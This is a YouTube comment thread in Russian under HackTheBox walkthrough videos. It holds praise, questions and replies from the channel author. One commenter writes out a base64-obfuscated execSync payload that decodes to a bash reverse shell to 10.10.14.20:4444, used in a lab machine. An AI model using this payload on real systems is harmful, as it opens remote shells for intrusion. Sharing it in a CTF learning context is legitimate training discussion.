Мекан, уже пол года прошло, где новые выпуски по CTF????
@nuken-t5o15 күн бұрын
Спасибо за видео. Очень хорошее замечание про запуск скриптов из интернета в начале видео (с POC эксплоита). Будет ли достаточно использовать виртуалку со снапшотами для этих целей? Это не отменяет факта проверки кода, но ведь не всегда код можно легко проверить.
@nuken-t5o22 күн бұрын
Спасибо за видео. Зачем в начале видео добавлять айпишник в хостс? Просто открыть страницу по айпишнику могло не сработать?
@MrCyberSec21 күн бұрын
Да, может не сработать, так как на HTB веб-сервисы часто настроены таким образом, что они работают только с определёнными доменными именами, связанными с виртуальными хостами. Если вы обращаетесь к такому сервису по IP или с неправильным именем хоста, он может не ответить
@nuken-t5o21 күн бұрын
@@MrCyberSec Понял, спасибо
@dmitrypavlov226624 күн бұрын
Круто)
@caretakerblazzzzzzz25 күн бұрын
Капец, у вас необыкновенный склад ума. Вы делаете столько разных мелочей, которые не делаю я при пентесте. Спасибо вам, буквально прививаете мне свои навыки!
@intruder7027 күн бұрын
не знаю подсказали ли ребята, но ошибка при проверке количества столбцов в sql injection заключалась в типах данных, там были int и временные типы. поэтому вместо 6 корректно было 5
@i_l_y_aАй бұрын
Странно что автор не говорит про role-based authorization... ведь сейчас просто одну JWT авторизацию не применяют, ну разве что какие самоучки-недоучки пару месяцев изучающие программирование. И авторизация на основе роли не пропустит суперхакера приписавшего себе парава admin после проверки в БД .
@marsnrg6533Ай бұрын
Вот это ничегосебе я откопал контент! Грамотно сделаный ролик, приятная картинка. Подача вообще супер. У Вас таллант!!! Спасибо за труд. Продолжайте в том же духе. Обязательно теперь пересмотрю все ваши видео. 🔥
@MrCyberSecАй бұрын
Спасибо!
@mrunderssonАй бұрын
так как избежать то?!
@kuanyshsagimbai56992 ай бұрын
Привет! Вопрос не по видео, я пытаюсь установить Kali как основную ОС на старенький ноутбук ACER. Сделал загрузочную флешку, изменил настройки БИОС , убрал secure boot , все хорошо устанавливается, но когда дело доходит до установки Grub loader экран зависает на 50% с надписью : running grub-install dummy. Уже все перепробовал, может ты подскажешь что делать?
@ИгорьСиницын-д5к2 ай бұрын
С озвучки "к&б" проорал😂
@MrCyberSecАй бұрын
:)))
@JustAmalll2 ай бұрын
👍🏽👍🏽👍🏽
@kotorycify2 ай бұрын
Лучший)))
@zolterzolter4592 ай бұрын
Спасибо мистер Сайберсек.
@pigeondoves2 ай бұрын
Дэвид Блейн
@pozavtrakakal3 ай бұрын
Я еще в игре Матрица так рута захватывал
@vvvarvfx3 ай бұрын
Классные видео, очень интересно! Такого контента не найдешь)) Какую ос вы используете в работе?
@MrCyberSecАй бұрын
Спасибо:) Kali Linux
@PaulSith3 ай бұрын
Этому дядьке кепка мозг совсем сдавила ... утечка приватного ключа с сервера) А ещё копирование его всего на флешку и выкладывание в интернет)
@1233-x4s3 ай бұрын
делай edit'ы. В названии уязвимость. Видос под фонк proof of concept
@roma4rever3 ай бұрын
Мекан, спасибо за видео! Они невероятно интересны. Есть ли в планах делать прохождения Windows-машин?
@DeadPool-pq7gq3 ай бұрын
Где новые видео?(
@strelkan3 ай бұрын
да, люди ждут же, буквально требуют новых взломов!
@JoonCrafting3 ай бұрын
Перебор хэша символа по байту, это было такое изящное действо, я такого никогда еще не видел, так до этого еще надо было догадаться!)) Мастер. Лайк и подписон оформлен.
@MaksimAsadchuk3 ай бұрын
Что у тебя за терминал ?
@olegovsyanikov96013 ай бұрын
кароч не было там папки .ssh (( создал сам записал ключ - не коннектит сделал шел с .execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvNDQ0NCAwPiYx | base64 -d | bash'); где в хеше по сути sh -i >& /dev/tcp/10.10.14.20/4444 0>&1 зайти зашел и записал еще раз уже другой ключ но не коннектит ссх - с вербозом вот debug1: Authentications that can continue: publickey,password debug1: Next authentication method: password странно почему у вас была .ssh папка и по идее после изменения authorized_keys нужно делать ребут sshd разве нет?
@eugenebelov91324 ай бұрын
Из твоих видео узнал больше, чем за пять лет работы в IT) Спасибо!
@Mike-fc3mz4 ай бұрын
Какие плагины в бурпе для этого есть?
@LongGlovv4 ай бұрын
А у меня уникальный алгоритм генерации и хранения паролей, без программ и т.п. Работает уже более 25 лет и меня не разу не взламывали.
@cocojamboo73004 ай бұрын
Я сам студент-инженер, но блин, как же это интересно... Мб посоветуете плейлисты на ютубе или сайты какие-нибудь, где можно было бы бесплатно в рамках хобби поучиться этому делу?
@stanislavsmetanin13074 ай бұрын
Вау!! Аплодирую стоя, маэстро.
@ПавелДариенко-и4б4 ай бұрын
Вот почему на канале прохождение старых машин. А я тут голову ломаю! А новые тачки где посмотреть?
@wefasziengof81804 ай бұрын
Спасибо, очень классно
@pubgmobile-ps1vh4 ай бұрын
какую ОС используйте?
@tifanyJons4 ай бұрын
Попробуй своими словами, ибо нудно все 8 минут
@yablofon5 ай бұрын
Люблю ваши видосы особенно когда их не банят как мануал к хакингу)
@artemplatinoff11855 ай бұрын
Киберсек про, удачи)
@igor_haib15795 ай бұрын
Бро побольше sherlock
@aqqqwhck95 ай бұрын
Спасибо за потрясающий контент! И такой вопрос, будут ли разборы тасков с forkbomb? Было бы интересно понаблюдать как именно вы их разбираете, спасибо!
@MrCyberSec5 ай бұрын
Спасибо! Возможно, я пока не рассматривал.
@EmailixProtonovskiy5 ай бұрын
Скучно бро. Когда винда, когда AD?
@MrCyberSec5 ай бұрын
В этом году точно будет
@FERRUM-ix5yk5 ай бұрын
вам опасно ставить дизлаки😂
@КириллЧеремушкин-ъ2ж5 ай бұрын
Офигеть как переход к руту сделал)
@КириллЧеремушкин-ъ2ж5 ай бұрын
Круто! Особенно классно, что вы показываете, как именно делаете, а не все сразу находите и сдаете. Спасибо!
@Lucius-xt1bh5 ай бұрын
Дэвид Блейн уличная магия на превью. Кто поймет тот поймет.
@TopTop-zr3jv5 ай бұрын
Я так понимаю для подключения к reverse shell нужно указывать ip машины с которой вы взаимодействуете с devvortex?
@MrCyberSec5 ай бұрын
Не обязательно. Это может быть IPшник любой машины, к которой devvortex сможет подключиться и к которой у вас есть доступ. В видео это моя машина, которая находится в той же сети что и devvortex.
@drstx5 ай бұрын
Попугай топ)
@программистомв405 ай бұрын
видео так сделано, что я по какой-то причине смотрю контент в котором ничего не понимаю))
@zerodaily_channel5 ай бұрын
Видео просто супер. Достаточно чтобы понять ИЛИ чтобы понять куда копать чтобы понять. Автору респект 👍
@satanyasha87305 ай бұрын
уличный маг в действии в рот мне ноги
@ДмитрийСтепанов-ф1щ5 ай бұрын
Ничего не понятно, но очень интересно
@kldev85665 ай бұрын
откуда такое условие что charset для пароля только латинские буквы и цифры? где спецсимволы?